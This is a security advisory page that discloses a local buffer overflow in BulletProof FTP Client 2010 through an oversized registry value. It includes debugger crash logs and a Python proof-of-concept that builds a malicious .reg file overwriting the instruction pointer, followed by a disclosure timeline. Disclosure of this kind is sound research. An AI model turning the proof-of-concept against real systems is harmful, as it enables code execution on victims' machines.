BulletProof FTP Client 2010 - Buffer Overflow Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus

Home
Ask the Team
Mailing Lists
Advertising Info
Advisories
About SecuriTeam
Blogs

Brought to you by:

Suppliers of:

SecuriTeam in Your Inbox

New vulnerability?
New tool?
Tell us
(Our PGP key).

Confidence 2013

5% Off any SANS course
Use Code: SecuriTeam_5

Hack In Paris

La Nuit du Hack

Subjects of Interest:
Vulnerability Management
SQL Injection
Buffer Overflows
Active Network Scanning
Fuzzing
Fuzzer Report
Network Security
Network Scanner
Pen Testing
Security Scanner

A Vulnerability Laboratory Researcher discovered a Local Buffer Overflow vulnerability on BulletProof FTP Client.

Credit:
The information has been provided by Julien Ahrens.

Free Website Security Scan	Free Fuzzer Report	Vulnerability Assessment
Detect web app vulnerabilities	University study comparing the top	Accurate and automated scanning
Get guidance from professionals.	6 commercially availble fuzzers.	for networks of any size.

Protect your website!
Free Trial, Nothing to install.
No interruption of visitors.
www.beyondsecurity.com/vulnerability-scanner

Vulnerable Systems:
* BPFTP Client Software (Windows) v2010.75.0.76 & 2011.x

A Buffer Overflow vulnerability is detected on BulletProof FTP Client v2010.75.0.76 (current version). The vulnerability is located
in the main executeable bpftpclient.exe. During the start of the application the value LogFileName from the
registry key [HKEY_CURRENT_USER/Software/BulletProof Software/BulletProof FTP Client 2010/Options] is read.
When inserting an oversized value to the registry value a buffer overflow is triggered. The victim only needs to start the application.

--- Debugger Logs ---
# 42424242: The instruction at 0x42424242 referenced memory at 0x42424242.
The memory could not be read -> 42424242 (exc.code c0000005, tid 2264)

# Registers:
# EAX 00000000
# ECX 42424242
# EDX 7C9132BC ntdll.7C9132BC
# EBX 00000000
# ESP 0012F594
# EBP 0012F5B4
# ESI 00000000
# EDI 00000000
# EIP 42424242

# Stack:
# 0012F588 00140198
# 0012F58C 7C91D80A ntdll.7C91D80A
# 0012F590 7C9601E1 ntdll.7C9601E1
# 0012F594 7C9132A8 RETURN to ntdll.7C9132A8
# 0012F598 0012F67C
# 0012F59C 0012FBCC ASCII ``AAAABBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC``
# 0012F5A0 0012F698

# Dump:
# 0012FBB4 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBBC 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBC4 41 41 41 41 41 41 41 41 AAAAAAAA
# 0012FBCC 41 41 41 41 42 42 42 42 AAAABBBB
# 0012FBD4 43 43 43 43 43 43 43 43 CCCCCCCC
# 0012FBDC 43 43 43 43 43 43 43 43 CCCCCCCC
# 0012FBE4 43 43 43 43 43 43 43 43 CCCCCCCC

Picture(s):
../1.png
../2.png

The vulnerability can be exploited by local attackers. Successful exploitation requires no user inter action. For demonstration or reproduce ...

#!/usr/bin/python

# Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
# Version: 2010.75.0.76
# Date: 2012-03-11
# Author: Julien Ahrens
# Homepage: http://www.inshell.net
# Software Link: http://www.bpftp.com/
# Tested on: Windows XP SP3 Professional German
# Notes: -
# Howto: Import Reg -> Start App

file="poc.reg"

junk1="\x41" * 448
boom="\x42\x42\x42\x42"
junk2="\x43" * 100

poc="Windows Registry Editor Version 5.00\n\n"
poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n"
poc=poc + "\"LogFileName\"=\"" + junk1 + boom + junk2 + "\""

try:
print "[*] Creating exploit file...\n";
writeFile = open (file, "w")
writeFile.write( poc )
writeFile.close()
print "[*] File successfully created!";
except:
print "[!] Error while creating file!";

Disclosure Timeline:
2012-03-14: Vendor Notification
2012-03-16: Vendor Response/Feedback
2012-04-02: Public or Non-Public Disclosure

blog comments powered by Disqus

	Moodle WebDav Repository Plaintext Password Disclosure Vulnerability
	QuickShare File Share Directory Traversal Vulnerability
	ELinks Security Bypass Vulnerability
	BlazeDVD PLF Exploit DEP/ASLR Bypass (MSF) Vulnerability
	WebKit Web Audio Channel Handling Race Condition Buffer Overflow Vulnerability
	Verax NMS Console AMF Response Plaintext Connection Information Disclosure Vulnerability
	Simeji for Android Application Handling Information Disclosure Vulnerability
	Ptlib Entity Expansion Recursion XML Nested Entity Handling DoS Vulnerability
	ownCloud /core/settings/ajax/setquota.php quota Parameter XSS Vulnerability
	Nitro Pro PDF File Handling DoS Vulnerability
	MailOrderWorks Dispatch Order Multiple Field XSS Vulnerability
	Linux Kernel Dccp Subsystem Ccid Null Pointer Dereference Local DoS Vulnerability
	ISC DHCP libdns Unspecified Remote Memory Exhaustion DoS Vulnerability
	GroundWork Monitor Enterprise Noma Component Multiple XSS Vulnerability
	GroundWork Monitor Enterprise Foundation Admin Interface XSS Vulnerability
	Google Chrome Isolated Web Sites Process Handling Issue Vulnerability
	Google Android On Samsung Unprivileged Arbitrary SMS Message Sending Vulnerability
	FFmpeg Libavcodec/error Function NULL Pointer Dereference DoS Vulnerability
	Commons Groups Module for Drupal Group Access Restriction Bypass Vulnerability
	Cfingerd RFC1413 (Ident) Client Remote Overflow Vulnerability

Featured Articles

	Mozilla Multiple Product HTML Editor Function Use-after-free Arbitrary Code Execution Vulnerability
	Exim with Dovecot Typical Misconfiguration Leads to Remote Command Execution Vulnerability
	IBM InfoSphere Information Server Unspecified Arbitrary Site Redirect Vulnerability
	Cisco Unity Express /Web/SA2/ScriptList.do gui_pagenotableData Parameter XSS Vulnerability
	Supportworks ITSM SQL Injection Vulnerability
	WirelessFiles for iPad/iPhone Multiple File Extension Upload Arbitrary Script Code Execution Vulnerability
	IBM InfoSphere Information Server Import Export Manager Path Subversion Arbitrary DLL Injection Code Execution Vulnerability
	CommentLuv Plugin for WordPress /wp-admin/admin-ajax.php _ajax_nonce Parameter XSS Vulnerability
	ownCloud Multiple Script Multiple Administrator Action CSRF Vulnerability
	IBM Multiple Product XSS Vulnerability
	TLS / DTLS Protocol CBC-Mode Ciphersuite Distinguishing Attack Information Disclosure Weakness Vulnerability
	JBoss Enterprise Application Platform / JBoss Enterprise Web Platform JMX Invoker Roll Restriction Weakness Vulnerability
	Google AD Sync Tool Exposure Of Sensitive Information Vulnerability
	VMware Multiple Product vmci.sys VMCI Control Code Handling Local Privilege Escalation Vulnerability
	Cisco Unity Express /Web/SA/SaveConfiguration.do Multiple Action CSRF Vulnerability
	AdPeeps /adpeeps_servlet.php Bannertext Parameter XSS Vulnerability
	Oracle Application Framework Diagnostic Mode Bypass Vulnerability
	Nero MediaHome NMMediaServer.dll Long Request Line Off-By-One Overflow Vulnerability
	Samba Samba Web Administration Tool (SWAT) Manipulation CSRF Vulnerability
	Adobe Flash Player And AIR Context Dependent Attacker Buffer Overflow Vulnerability

Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs